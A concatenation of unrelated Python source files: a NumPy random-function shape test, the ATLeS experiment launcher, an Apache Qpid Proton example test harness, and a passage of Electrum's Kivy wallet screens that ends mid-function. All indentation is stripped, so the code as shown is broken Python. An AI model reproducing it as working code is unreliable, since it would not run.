class TestSingleEltArrayInput:
def setup(self):
self.argOne = np.array([2])
self.argTwo = np.array([3])
self.argThree = np.array([4])
self.tgtShape = (1,)
def test_one_arg_funcs(self):
funcs = (np.random.exponential, np.random.standard_gamma,
np.random.chisquare, np.random.standard_t,
np.random.pareto, np.random.weibull,
np.random.power, np.random.rayleigh,
np.random.poisson, np.random.zipf,
np.random.geometric, np.random.logseries)
probfuncs = (np.random.geometric, np.random.logseries)
for func in funcs:
if func in probfuncs: # p < 1.0
out = func(np.array([0.5]))
else:
out = func(self.argOne)
assert_equal(out.shape, self.tgtShape)
def test_two_arg_funcs(self):
funcs = (np.random.uniform, np.random.normal,
np.random.beta, np.random.gamma,
np.random.f, np.random.noncentral_chisquare,
np.random.vonmises, np.random.laplace,
np.random.gumbel, np.random.logistic,
np.random.lognormal, np.random.wald,
np.random.binomial, np.random.negative_binomial)
probfuncs = (np.random.binomial, np.random.negative_binomial)
for func in funcs:
if func in probfuncs: # p <= 1
argTwo = np.array([0.5])
else:
argTwo = self.argTwo
out = func(self.argOne, argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, argTwo[0])
assert_equal(out.shape, self.tgtShape)
# TODO: Uncomment once randint can broadcast arguments
# def test_randint(self):
# itype = [bool, np.int8, np.uint8, np.int16, np.uint16,
# np.int32, np.uint32, np.int64, np.uint64]
# func = np.random.randint
# high = np.array([1])
# low = np.array([0])
#
# for dt in itype:
# out = func(low, high, dtype=dt)
# self.assert_equal(out.shape, self.tgtShape)
#
# out = func(low[0], high, dtype=dt)
# self.assert_equal(out.shape, self.tgtShape)
#
# out = func(low, high[0], dtype=dt)
# self.assert_equal(out.shape, self.tgtShape)
def test_three_arg_funcs(self):
funcs = [np.random.noncentral_f, np.random.triangular,
np.random.hypergeometric]
for func in funcs:
out = func(self.argOne, self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, self.argTwo[0], self.argThree)
assert_equal(out.shape, self.tgtShape)
|
atles_box.py | #!/usr/bin/env python3
import argparse
import atexit
from collections import OrderedDict
try:
from ConfigParser import RawConfigParser
except ImportError:
from configparser import RawConfigParser
import logging
import os
import random
import pipes # TODO: move to python3 and use shlex.quote() instead
import signal
import sys
import threading
import time
import config
from common import Phase, get_boxname, mkdir
from box import experiment
def greedy_parse(s):
for _type in int, float:
try:
return _type(s)
except:
pass
return s
def get_conf(args):
'''Read a configuration file, add configuration from cmdline args.'''
config_filename = args.inifile
if not os.path.isfile(config_filename):
logging.error("Configuration file not found: %s", config_filename)
sys.exit(1)
parser = RawConfigParser()
parser.read(config_filename)
conf = {}
# create a dictionary for each section
for section in parser.sections():
conf[section] = {}
for key in parser.options(section):
# Currently, all configuration options will be numeric.
# greedy_parse() converts each to a float or an int, if it can.
conf[section][key] = greedy_parse(parser.get(section, key))
# setup a 'general' section of the configuration
# (mostly for the record in the -setup.txt file)
conf['general'] = {}
conf['general']['notes'] = args.notes
conf['general']['inifile'] = args.inifile
conf['general']['boxname'] = get_boxname()
return conf
def setup_phases(args, conf):
# create a dictionary for relevant cmdline arguments,
conf['phases'] = {}
section = conf['phases']
section['phases_argstrings'] = ' '.join("-p %s" % p for p in args.phases)
# setup phases data to be used during experiment execution
phase_args = [p.split(',') for p in args.phases]
phases = []
for i, (length, stim, background) in enumerate(phase_args):
# 1-based phase counting
phasenum = i+1
length = int(length)
# Determine and record whether stimulus is enabled for each phase
if stim == 'on':
dostim = True
elif stim == 'off':
dostim = False
elif stim == 'rand':
dostim = random.choice([True, False])
logging.info("stim=rand selected for phase %d; chose stimulus %s." % (phasenum, ("ENABLED" if dostim else "DISABLED")))
phase_data = Phase(phasenum, length, dostim, background)
phases.append(phase_data)
section['phase_%d_length' % phasenum] = length
section['phase_%d_dostim' % phasenum] = dostim
section['phase_%d_background' % phasenum] = background
section['phases_data'] = phases
def get_args():
'''Parse and return command-line arguments.'''
parser = argparse.ArgumentParser(description='ATLeS box experiment.')
parser.add_argument('id', type=str, nargs='?', default='',
help='experiment ID (optional), added to output filenames')
parser.add_argument('-w', '--watch', action='store_true',
help='create a window to see the camera view and tracking information')
parser.add_argument('--debug-frames', type=int, default=100, metavar='N',
help='save an image of the current frame every N frames - also saves a frame any time tracking is lost (default: 100; 0 means no debug frames will be written, including tracking-lost frames)')
parser.add_argument('--notes', type=str,
help='additional notes to be saved alongside the experiment data (optional)')
# exp_group = parser.add_argument_group('experiment settings')
# exp_group.add_argument('-t', '--time', type=int, default=None,
# help='limit the experiment to TIME minutes (default: run forever / until stopped with CTRL-C)')
# exp_group.add_argument('--time-from-trigger', action='store_true',
# help='when using -t/--time, only start counting the time from the moment the tracking first hits its trigger condition'),
# stimgroup = exp_group.add_mutually_exclusive_group(required=False)
# stimgroup.add_argument('--nostim', action='store_true',
# help='disable all stimulus for this run')
# stimgroup.add_argument('--randstim', action='store_true',
# help='choose whether to enable or disable stimulus for this run with 50/50 probabilities')
parser.add_argument('-p', '--phases', type=str, action='append',
help='configure phases of the experiment. '
'Each phase is specified as "len,stim,background", '
'where "len" is the phase length in minutes, '
'"stim" is one of '
'"on", "off", or "rand", controlling whether the '
'stimulus is on, off, or randomly enabled with '
'a 50%% chance, '
'and "background" is an image file to display on the monitor. '
'Specify each phase with its own -p/--phases '
'argument in the order the phases should run. '
'e.g.: "-p 10,off,a.png -p 30,rand,b.png -p 30,off,a.png" '
'If not specified, atles_box runs a single, '
'infinite "phase" with stim=True and a black background image.'
)
rare_group = parser.add_argument_group('rarely-used arguments')
rare_group.add_argument('--inifile', type=str, default='../ini/default.ini',
help="path to configuration file specifying physical setup (default: ../ini/default.ini)")
rare_group.add_argument('--vidfile', type=str,
help='read video input from the given file (for testing purposes)')
rare_group.add_argument('--delay', type=int, default=0,
help='delay in ms to add between frames (default: 0) -- useful for slowing video processing/display.')
return parser.parse_args()
def init_logging(args, conf):
'''Initialize the logging system. Uses argdir and id from args, adds 'trackfile' to conf
as a file object to which track data should be written.'''
# setup log files
filetimestamp = time.strftime("%Y%m%d-%H%M%S")
if args.id:
name = "%s-%s" % (filetimestamp, args.id)
else:
name = filetimestamp
conf['name'] = name
# ensure log and image directories exist
mkdir(config.TRACKDIR, config.REMOTE_USER)
debugframe_dir = "%s/%s" % (config.DBGFRAMEDIR, name)
# Make debugframedir world-writable so rsync can delete it.
oldmask = os.umask(0)
mkdir(debugframe_dir, config.REMOTE_USER)
os.umask(oldmask)
conf['debugframe_dir'] = debugframe_dir
trackfilename = "%s/%s-track.csv" % (config.TRACKDIR, name)
logfilename = "%s/%s.log" % (config.TRACKDIR, name)
# Setup the ROOT level logger to send to a log file and console both
logger = logging.getLogger()
logger.setLevel(logging.INFO)
fh = logging.FileHandler(filename=logfilename)
fh.setFormatter(
logging.Formatter(fmt="%(asctime)s [%(levelname)s] %(message)s"))
sh = logging.StreamHandler()
sh.setFormatter(
logging.Formatter(fmt="[%(levelname)s] %(message)s"))
logger.addHandler(fh)
logger.addHandler(sh)
logging.info("Logging started.")
conf['trackfile'] = open(trackfilename, 'w')
def write_setup(conf):
# Record the setup in a -setup.txt file.
parser = RawConfigParser(dict_type=OrderedDict)
for section in conf:
if not isinstance(conf[section], dict):
# only record values stored in sections/dicts
continue
parser.add_section(section)
for key in sorted(conf[section]):
parser.set(section, key, conf[section][key])
setupfilename = "%s/%s-setup.txt" % (config.TRACKDIR, conf['name'])
with open(setupfilename, 'w') as setupfile:
# TODO: move to python3 and use shlex.quote() instead
cmdline = repr(' '.join(pipes.quote(s) for s in sys.argv))
setupfile.write("; Command line:\n; {}\n;\n".format(cmdline))
setupfile.write("; Configuration:\n")
parser.write(setupfile)
def sighandler(signum, frame):
if signum == signal.SIGALRM:
logging.info("Terminating experiment after timeout.")
sys.exit(0)
elif signum == signal.SIGINT:
logging.info("Caught ctrl-C; exiting.")
sys.exit(1)
elif signum == signal.SIGTERM:
logging.info("Caught SIGTERM; exiting.")
sys.exit(1)
else:
logging.warn("Unexpected signal received (%d); exiting." % signum)
sys.exit(1)
def main():
args = get_args()
conf = get_conf(args)
init_logging(args, conf)
if args.phases:
# add phases and runtime-decided config
setup_phases(args, conf)
total_time = sum(p.length for p in conf['phases']['phases_data'])
else:
# run as a single "infinite" phase with dostim=True
# and a black background image
conf['phases'] = {}
onephase = Phase(1, float('inf'), True, 'black.png')
conf['phases']['phases_data'] = [onephase]
total_time = None
# record all configuration to the setup file
write_setup(conf)
# catch SIGINT (ctrl-C) and SIGTERM
signal.signal(signal.SIGINT, sighandler)
signal.signal(signal.SIGTERM, sighandler)
# setup lock file
try:
# O_CREAT | O_EXCL ensure that this call creates the file,
# raises OSError if file exists
lockfd = os.open(str(config.LOCKFILE), os.O_CREAT | os.O_EXCL | os.O_WRONLY)
lockfile = os.fdopen(lockfd, 'w')
# store PID, start time (in UTC), and experiment runtime
lockfile.write("%d\n%d\n%d\n" % (os.getpid(), int(time.time()), total_time*60 if total_time else 0))
lockfile.close()
# remove lockfile at exit
atexit.register(config.LOCKFILE.unlink)
except ValueError:
logging.error("It appears an experiment is already running (%s exists). Please wait or end that experiment before starting another." % config.LOCKFILE)
sys.exit(1)
# create Experiment object
exp = experiment.Experiment(conf, args)
# setup timeout alarm as a backup
# NOTE: not cross-platform (SIGALRM not available on Windows)
if total_time and sys.platform in ['cygwin', 'nt']:
logging.warning("SIGALRM not available under Windows. Backup timeout not enabled.")
elif total_time:
signal.signal(signal.SIGALRM, sighandler)
signal.alarm(total_time*60 + 60) # with 60 seconds buffer
# run in separate thread so signal handler is more reliable
runthread = threading.Thread(target=exp.run)
runthread.daemon = True # so thread is killed when main thread exits (e.g. in signal handler)
runthread.start()
if sys.version_info[0] >= 3:
runthread.join()
else:
# In Python 2, a timeout is required for join() to not just
# call a blocking C function (thus blocking the signal handler).
# However, infinity works.
runthread.join(float("inf"))
sys.exit(0)
if __name__ == '__main__':
main()
|
example_test.py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License
#
# This is a test script to run the examples and verify that they behave as expected.
import unittest
import os, sys, socket, time, re, inspect
from random import randrange
from subprocess import Popen, PIPE, STDOUT, call
from copy import copy
import platform
from os.path import dirname as dirname
from threading import Thread, Event
from string import Template
createdSASLDb = False
def findfileinpath(filename, searchpath):
"""Find filename in the searchpath
return absolute path to the file or None
"""
paths = searchpath.split(os.pathsep)
for path in paths:
if os.path.exists(os.path.join(path, filename)):
return os.path.abspath(os.path.join(path, filename))
return None
def _cyrusSetup(conf_dir):
"""Write out simple SASL config.
"""
saslpasswd = ""
if 'SASLPASSWD' in os.environ:
saslpasswd = os.environ['SASLPASSWD']
else:
saslpasswd = findfileinpath('saslpasswd2', os.getenv('PATH')) or ""
if os.path.exists(saslpasswd):
t = Template("""sasldb_path: ${db}
mech_list: EXTERNAL DIGEST-MD5 SCRAM-SHA-1 CRAM-MD5 PLAIN ANONYMOUS
""")
abs_conf_dir = os.path.abspath(conf_dir)
call(args=['rm','-rf',abs_conf_dir])
os.mkdir(abs_conf_dir)
db = os.path.join(abs_conf_dir,'proton.sasldb')
conf = os.path.join(abs_conf_dir,'proton-server.conf')
f = open(conf, 'w')
f.write(t.substitute(db=db))
f.close()
cmd_template = Template("echo password | ${saslpasswd} -c -p -f ${db} -u proton user")
cmd = cmd_template.substitute(db=db, saslpasswd=saslpasswd)
call(args=cmd, shell=True)
os.environ['PN_SASL_CONFIG_PATH'] = abs_conf_dir
global createdSASLDb
createdSASLDb = True
# Globally initialize Cyrus SASL configuration
#if SASL.extended():
_cyrusSetup('sasl_conf')
def ensureCanTestExtendedSASL():
# if not SASL.extended():
# raise Skipped('Extended SASL not supported')
if not createdSASLDb:
raise Skipped("Can't Test Extended SASL: Couldn't create auth db")
def pick_addr():
"""Pick a new host:port address."""
# TODO Conway 2015-07-14: need a safer way to pick ports.
p = randrange(10000, 20000)
return "127.0.0.1:%s" % p
class ProcError(Exception):
"""An exception that captures failed process output"""
def __init__(self, proc, what="non-0 exit"):
out = proc.out.strip()
if out:
out = "\nvvvvvvvvvvvvvvvv\n%s\n^^^^^^^^^^^^^^^^\n" % out
else:
out = ", no output)"
super(Exception, self, ).__init__(
"%s %s, code=%s%s" % (proc.args, what, proc.returncode, out))
class Proc(Popen):
"""A example process that stores its stdout and can scan it for a 'ready' pattern'"""
if "VALGRIND" in os.environ and os.environ["VALGRIND"]:
env_args = [os.environ["VALGRIND"], "--error-exitcode=42", "--quiet", "--leak-check=full"]
else:
env_args = []
def __init__(self, args, ready=None, timeout=30, skip_valgrind=False, **kwargs):
"""Start an example process"""
args = list(args)
if platform.system() == "Windows":
args[0] += ".exe"
self.timeout = timeout
self.args = args
self.out = ""
if not skip_valgrind:
args = self.env_args + args
try:
Popen.__init__(self, args, stdout=PIPE, stderr=STDOUT,
universal_newlines=True, **kwargs)
except Exception as e:
raise ProcError(self, str(e))
# Start reader thread.
self.pattern = ready
self.ready = Event()
# Help with Python 2.5, 2.6, 2.7 changes to Event.wait(), Event.is_set
self.ready_set = False
self.error = None
self.thread = Thread(target=self.run_)
self.thread.daemon = True
self.thread.start()
if self.pattern:
self.wait_ready()
def run_(self):
try:
while True:
l = self.stdout.readline()
if not l: break
self.out += l
if self.pattern is not None:
if re.search(self.pattern, l):
self.ready_set = True
self.ready.set()
if self.wait() != 0:
raise ProcError(self)
except Exception as e:
self.error = e
finally:
self.stdout.close()
self.ready_set = True
self.ready.set()
def safe_kill(self):
"""Kill and clean up zombie but don't wait forever. No exceptions."""
try:
self.kill()
self.thread.join(self.timeout)
except: pass
return self.out
def check_(self):
if self.error:
raise self.error
def wait_ready(self):
"""Wait for ready to appear in output"""
self.ready.wait(self.timeout)
if self.ready_set:
self.check_()
return self.out
else:
self.safe_kill()
raise ProcError(self, "timeout waiting for '%s'" % self.pattern)
def wait_exit(self):
"""Wait for process to exit, return output. Raise ProcError on failure."""
self.thread.join(self.timeout)
if self.poll() is not None:
self.check_()
return self.out
else:
raise ProcError(self, "timeout waiting for exit")
if hasattr(unittest.TestCase, 'setUpClass') and hasattr(unittest.TestCase, 'tearDownClass'):
TestCase = unittest.TestCase
else:
class TestCase(unittest.TestCase):
"""
Roughly provides setUpClass and tearDownClass functionality for older python
versions in our test scenarios. If subclasses override setUp or tearDown
they *must* call the superclass.
"""
def setUp(self):
if not hasattr(type(self), '_setup_class_count'):
type(self)._setup_class_count = len(
inspect.getmembers(
type(self),
predicate=lambda m: inspect.ismethod(m) and m.__name__.startswith('test_')))
type(self).setUpClass()
def tearDown(self):
self.assertTrue(self._setup_class_count > 0)
self._setup_class_count -= 1
if self._setup_class_count == 0:
type(self).tearDownClass()
class ExampleTestCase(TestCase):
"""TestCase that manages started processes"""
def setUp(self):
super(ExampleTestCase, self).setUp()
self.procs = []
def tearDown(self):
for p in self.procs:
p.safe_kill()
super(ExampleTestCase, self).tearDown()
def proc(self, *args, **kwargs):
p = Proc(*args, **kwargs)
self.procs.append(p)
return p
class BrokerTestCase(ExampleTestCase):
"""
ExampleTest that starts a broker in setUpClass and kills it in tearDownClass.
Subclasses must set `broker_exe` class variable with the name of the broker executable.
"""
@classmethod
def setUpClass(cls):
cls.addr = pick_addr() + "/examples"
cls.broker = None # In case Proc throws, create the attribute.
cls.broker = Proc([cls.broker_exe, "-a", cls.addr], ready="listening")
cls.broker.wait_ready()
@classmethod
def tearDownClass(cls):
if cls.broker: cls.broker.safe_kill()
def tearDown(self):
b = type(self).broker
if b and b.poll() != None: # Broker crashed
type(self).setUpClass() # Start another for the next test.
raise ProcError(b, "broker crash")
super(BrokerTestCase, self).tearDown()
CLIENT_EXPECT="""Twas brillig, and the slithy toves => TWAS BRILLIG, AND THE SLITHY TOVES
Did gire and gymble in the wabe. => DID GIRE AND GYMBLE IN THE WABE.
All mimsy were the borogroves, => ALL MIMSY WERE THE BOROGROVES,
And the mome raths outgrabe. => AND THE MOME RATHS OUTGRABE.
"""
def recv_expect(name, addr):
return "%s listening on %s\n%s" % (
name, addr, "".join(['{"sequence"=%s}\n' % (i+1) for i in range(100)]))
class ContainerExampleTest(BrokerTestCase):
"""Run the container examples, verify they behave as expected."""
broker_exe = "broker"
def test_helloworld(self):
self.assertEqual('Hello World!\n', self.proc(["helloworld", self.addr]).wait_exit())
def test_helloworld_direct(self):
self.assertEqual('Hello World!\n', self.proc(["helloworld_direct", pick_addr()]).wait_exit())
def test_simple_send_recv(self):
self.assertEqual("all messages confirmed\n",
self.proc(["simple_send", "-a", self.addr]).wait_exit())
self.assertEqual(recv_expect("simple_recv", self.addr), self.proc(["simple_recv", "-a", self.addr]).wait_exit())
def test_simple_recv_send(self):
# Start receiver first, then run sender"""
recv = self.proc(["simple_recv", "-a", self.addr])
self.assertEqual("all messages confirmed\n",
self.proc(["simple_send", "-a", self.addr]).wait_exit())
self.assertEqual(recv_expect("simple_recv", self.addr), recv.wait_exit())
def test_simple_send_direct_recv(self):
addr = pick_addr()
recv = self.proc(["direct_recv", "-a", addr], "listening")
self.assertEqual("all messages confirmed\n",
self.proc(["simple_send", "-a", addr]).wait_exit())
self.assertEqual(recv_expect("direct_recv", addr), recv.wait_exit())
def test_simple_recv_direct_send(self):
addr = pick_addr()
send = self.proc(["direct_send", "-a", addr], "listening")
self.assertEqual(recv_expect("simple_recv", addr),
self.proc(["simple_recv", "-a", addr]).wait_exit())
self.assertEqual(
"direct_send listening on %s\nall messages confirmed\n" % addr,
send.wait_exit())
def test_request_response(self):
server = self.proc(["server", "-a", self.addr], "connected")
self.assertEqual(CLIENT_EXPECT,
self.proc(["client", "-a", self.addr]).wait_exit())
def test_request_response_direct(self):
addr = pick_addr()
server = self.proc(["server_direct", "-a", addr+"/examples"], "listening")
self.assertEqual(CLIENT_EXPECT,
self.proc(["client", "-a", addr+"/examples"]).wait_exit())
def test_flow_control(self):
want="""success: Example 1: simple credit
success: Example 2: basic drain
success: Example 3: drain without credit
success: Exmaple 4: high/low watermark
"""
self.assertEqual(want, self.proc(["flow_control", "--address", pick_addr(), "--quiet"]).wait_exit())
def test_encode_decode(self):
want="""
== Array, list and map of uniform type.
array<int>[int(1), int(2), int(3)]
[ 1 2 3 ]
list[int(1), int(2), int(3)]
[ 1 2 3 ]
map{string(one):int(1), string(two):int(2)}
{ one:1 two:2 }
map{string(z):int(3), string(a):int(4)}
[ z:3 a:4 ]
list[string(a), string(b), string(c)]
== List and map of mixed type values.
list[int(42), string(foo)]
[ 42 foo ]
map{int(4):string(four), string(five):int(5)}
{ 4:four five:5 }
== Insert with stream operators.
array<int>[int(1), int(2), int(3)]
list[int(42), boolean(0), symbol(x)]
map{string(k1):int(42), symbol(k2):boolean(0)}
"""
self.maxDiff = None
self.assertEqual(want, self.proc(["encode_decode"]).wait_exit())
def ssl_certs_dir(self):
"""Absolute path to the test SSL certificates"""
pn_root = dirname(dirname(dirname(sys.argv[0])))
return os.path.join(pn_root, "examples/cpp/ssl_certs")
def test_ssl(self):
# SSL without SASL, VERIFY_PEER_NAME
addr = "amqps://" + pick_addr() + "/examples"
# Disable valgrind when using OpenSSL
out = self.proc(["ssl", "-a", addr, "-c", self.ssl_certs_dir()], skip_valgrind=True).wait_exit()
expect = "Outgoing client connection connected via SSL. Server certificate identity CN=test_server\nHello World!"
expect_found = (out.find(expect) >= 0)
self.assertEqual(expect_found, True)
def test_ssl_no_name(self):
# VERIFY_PEER
addr = "amqps://" + pick_addr() + "/examples"
# Disable valgrind when using OpenSSL
out = self.proc(["ssl", "-a", addr, "-c", self.ssl_certs_dir(), "-v", "noname"], skip_valgrind=True).wait_exit()
expect = "Outgoing client connection connected via SSL. Server certificate identity CN=test_server\nHello World!"
expect_found = (out.find(expect) >= 0)
self.assertEqual(expect_found, True)
def test_ssl_bad_name(self):
# VERIFY_PEER
addr = "amqps://" + pick_addr() + "/examples"
# Disable valgrind when using OpenSSL
out = self.proc(["ssl", "-a", addr, "-c", self.ssl_certs_dir(), "-v", "fail"], skip_valgrind=True).wait_exit()
expect = "Expected failure of connection with wrong peer name"
expect_found = (out.find(expect) >= 0)
self.assertEqual(expect_found, True)
def test_ssl_client_cert(self):
# SSL with SASL EXTERNAL
expect="""Inbound client certificate identity CN=test_client
Outgoing client connection connected via SSL. Server certificate identity CN=test_server
Hello World!
"""
addr = "amqps://" + pick_addr() + "/examples"
# Disable valgrind when using OpenSSL
out = self.proc(["ssl_client_cert", addr, self.ssl_certs_dir()], skip_valgrind=True).wait_exit()
expect_found = (out.find(expect) >= 0)
self.assertEqual(expect_found, True)
def test_scheduled_send_03(self):
# Output should be a bunch of "send" lines but can't guarantee exactly how many.
out = self.proc(["scheduled_send_03", "-a", self.addr+"scheduled_send", "-t", "0.1", "-i", "0.001"]).wait_exit().split()
self.assertTrue(len(out) > 0);
self.assertEqual(["send"]*len(out), out)
def test_scheduled_send(self):
try:
out = self.proc(["scheduled_send", "-a", self.addr+"scheduled_send", "-t", "0.1", "-i", "0.001"]).wait_exit().split()
self.assertTrue(len(out) > 0);
self.assertEqual(["send"]*len(out), out)
except ProcError: # File not found, not a C++11 build.
pass
class EngineTestCase(BrokerTestCase):
"""Run selected clients to test a connction_engine broker."""
def test_helloworld(self):
self.assertEqual('Hello World!\n',
self.proc(["helloworld", self.addr]).wait_exit())
def test_simple_send_recv(self):
self.assertEqual("all messages confirmed\n",
self.proc(["simple_send", "-a", self.addr]).wait_exit())
self.assertEqual(recv_expect("simple_recv", self.addr), self.proc(["simple_recv", "-a", self.addr]).wait_exit())
def test_simple_recv_send(self):
# Start receiver first, then run sender"""
recv = self.proc(["simple_recv", "-a", self.addr])
self.assertEqual("all messages confirmed\n", self.proc(["simple_send", "-a", self.addr]).wait_exit())
self.assertEqual(recv_expect("simple_recv", self.addr), recv.wait_exit())
def test_simple_send_direct_recv(self):
addr = pick_addr()
recv = self.proc(["direct_recv", "-a", addr], "listening")
self.assertEqual("all messages confirmed\n",
self.proc(["simple_send", "-a", addr]).wait_exit())
self.assertEqual(recv_expect("direct_recv", addr), recv.wait_exit())
def test_simple_recv_direct_send(self):
addr = pick_addr()
send = self.proc(["direct_send", "-a", addr], "listening")
self.assertEqual(recv_expect("simple_recv", addr),
self.proc(["simple_recv", "-a", addr]).wait_exit())
self.assertEqual("direct_send listening on %s\nall messages confirmed\n" % addr,
send.wait_exit())
def test_request_response(self):
server = self.proc(["server", "-a", self.addr], "connected")
self.assertEqual(CLIENT_EXPECT,
self.proc(["client", "-a", self.addr]).wait_exit())
class MtBrokerTest(EngineTestCase):
broker_exe = "mt_broker"
if __name__ == "__main__":
unittest.main()
|
screens.py | import asyncio
from weakref import ref
from decimal import Decimal
import re
import threading
import traceback, sys
from typing import TYPE_CHECKING, List
from kivy.app import App
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.compat import string_types
from kivy.properties import (ObjectProperty, DictProperty, NumericProperty,
ListProperty, StringProperty)
from kivy.uix.recycleview import RecycleView
from kivy.uix.label import Label
from kivy.uix.behaviors import ToggleButtonBehavior
from kivy.uix.image import Image
from kivy.lang import Builder
from kivy.factory import Factory
from kivy.utils import platform
from electrum.bitcoin import TYPE_ADDRESS
from electrum.util import profiler, parse_URI, format_time, InvalidPassword, NotEnoughFunds, Fiat
from electrum.util import PR_TYPE_ONCHAIN, PR_TYPE_LN
from electrum import bitcoin, constants
from electrum.transaction import TxOutput, Transaction, tx_from_str
from electrum.util import send_exception_to_crash_reporter, parse_URI, InvalidBitcoinURI
from electrum.util import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED, TxMinedInfo, get_request_status, pr_expiration_values
from electrum.plugin import run_hook
from electrum.wallet import InternalAddressCorruption
from electrum import simple_config
from electrum.lnaddr import lndecode
from electrum.lnutil import RECEIVED, SENT, PaymentFailure
from .dialogs.question import Question
from .dialogs.lightning_open_channel import LightningOpenChannelDialog
from electrum.gui.kivy.i18n import _
if TYPE_CHECKING:
from electrum.gui.kivy.main_window import ElectrumWindow
class HistoryRecycleView(RecycleView):
pass
class RequestRecycleView(RecycleView):
pass
class PaymentRecycleView(RecycleView):
pass
class CScreen(Factory.Screen):
__events__ = ('on_activate', 'on_deactivate', 'on_enter', 'on_leave')
action_view = ObjectProperty(None)
loaded = False
kvname = None
app = App.get_running_app() # type: ElectrumWindow
def _change_action_view(self):
app = App.get_running_app()
action_bar = app.root.manager.current_screen.ids.action_bar
_action_view = self.action_view
if (not _action_view) or _action_view.parent:
return
action_bar.clear_widgets()
action_bar.add_widget(_action_view)
def on_enter(self):
# FIXME: use a proper event don't use animation time of screen
Clock.schedule_once(lambda dt: self.dispatch('on_activate'), .25)
pass
def update(self):
pass
@profiler
def load_screen(self):
self.screen = Builder.load_file('electrum/gui/kivy/uix/ui_screens/' + self.kvname + '.kv')
self.add_widget(self.screen)
self.loaded = True
self.update()
setattr(self.app, self.kvname + '_screen', self)
def on_activate(self):
if self.kvname and not self.loaded:
self.load_screen()
#Clock.schedule_once(lambda dt: self._change_action_view())
def on_leave(self):
self.dispatch('on_deactivate')
def on_deactivate(self):
pass
# note: this list needs to be kept in sync with another in qt
TX_ICONS = [
"unconfirmed",
"close",
"unconfirmed",
"close",
"clock1",
"clock2",
"clock3",
"clock4",
"clock5",
"confirmed",
]
class HistoryScreen(CScreen):
tab = ObjectProperty(None)
kvname = 'history'
cards = {}
def __init__(self, **kwargs):
self.ra_dialog = None
super(HistoryScreen, self).__init__(**kwargs)
def show_item(self, obj):
key = obj.key
tx = self.app.wallet.db.get_transaction(key)
if not tx:
return
self.app.tx_dialog(tx)
def get_card(self, tx_item): #tx_hash, tx_mined_status, value, balance):
is_lightning = tx_item.get('lightning', False)
timestamp = tx_item['timestamp']
key = tx_item.get('txid') or tx_item['payment_hash']
if is_lightning:
status = 0
txpos = tx_item['txpos']
status_str = 'unconfirmed' if timestamp is None else format_time(int(timestamp))
icon = "atlas://electrum/gui/kivy/theming/light/lightning"
message = tx_item['label']
fee_msat = tx_item['fee_msat']
fee = int(fee_msat/1000) if fee_msat else None
fee_text = '' if fee is None else 'fee: %d sat'%fee
else:
tx_hash = tx_item['txid']
conf = tx_item['confirmations']
txpos = tx_item['txpos_in_block'] or 0
height = tx_item['height']
tx_mined_info = TxMinedInfo(height=tx_item['height'],
conf=tx_item['confirmations'],
timestamp=tx_item['timestamp'])
status, status_str = self.app.wallet.get_tx_status(tx_hash, tx_mined_info)
icon = "atlas://electrum/gui/kivy/theming/light/" + TX_ICONS[status]
message = tx_item['label'] or tx_hash
fee = tx_item['fee_sat']
fee_text = '' if fee is None else 'fee: %d sat'%fee
ri = {}
ri['screen'] = self
ri['key'] = key
ri['icon'] = icon
ri['date'] = status_str
ri['message'] = message
ri['fee_text'] = fee_text
value = tx_item['value'].value
if value is not None:
ri['is_mine'] = value <= 0
ri['amount'] = self.app.format_amount(value, is_diff = True)
if 'fiat_value' in tx_item:
ri['quote_text'] = str(tx_item['fiat_value'])
return ri
def update(self, see_all=False):
import operator
wallet = self.app.wallet
if wallet is None:
return
history = sorted(wallet.get_full_history(self.app.fx).values(), key=lambda x: x.get('timestamp') or float('inf'), reverse=True)
history_card = self.screen.ids.history_container
history_card.data = [self.get_card(item) for item in history]
class SendScreen(CScreen):
kvname = 'send'
payment_request = None
payment_request_queued = None
parsed_URI = None
def set_URI(self, text):
if not self.app.wallet:
self.payment_request_queued = text
return
try:
uri = parse_URI(text, self.app.on_pr, loop=self.app.asyncio_loop)
except InvalidBitcoinURI as e:
self.app.show_info(_("Error parsing URI") + f":\n{e}")
return
self.parsed_URI = uri
amount = uri.get('amount')
self.screen.address = uri.get('address', '')
self.screen.message = uri.get('message', '')
self.screen.amount = self.app.format_amount_and_units(amount) if amount else ''
self.payment_request = None
self.screen.is_lightning = False
def set_ln_invoice(self, invoice):
try:
lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP)
except Exception as e:
self.app.show_info(invoice + _(" is not a valid Lightning invoice: ") + repr(e)) # repr because str(Exception()) == ''
return
self.screen.address = invoice
self.screen.message = dict(lnaddr.tags).get('d', None)
self.screen.amount = self.app.format_amount_and_units(lnaddr.amount * bitcoin.COIN) if lnaddr.amount else ''
self.payment_request = None
self.screen.is_lightning = True
def update(self):
if not self.loaded:
return
if self.app.wallet and self.payment_request_queued:
self.set_URI(self.payment_request_queued)
self.payment_request_queued = None
_list = self.app.wallet.get_invoices()
payments_container = self.screen.ids.payments_container
payments_container.data = [self.get_card(item) for item in _list if item['status'] != PR_PAID]
def show_item(self, obj):
self.app.show_invoice(obj.is_lightning, obj.key)
def get_card(self, item):
invoice_type = item['type']
if invoice_type == PR_TYPE_LN:
key = item['rhash']
status = get_request_status(item) # convert to str
elif invoice_type == PR_TYPE_ONCHAIN:
key = item['id']
status = get_request_status(item) # convert to str
else:
raise Exception('unknown invoice type')
return {
'is_lightning': invoice_type == PR_TYPE_LN,
'is_bip70': 'bip70' in item,
'screen': self,
'status': status,
'key': key,
'memo': item['message'],
'amount': self.app.format_amount_and_units(item['amount'] or 0),
}
def do_clear(self):
self.screen.amount = ''
self.screen.message = ''
self.screen.address = ''
self.payment_request = None
self.screen.locked = False
self.parsed_URI = None
def set_request(self, pr):
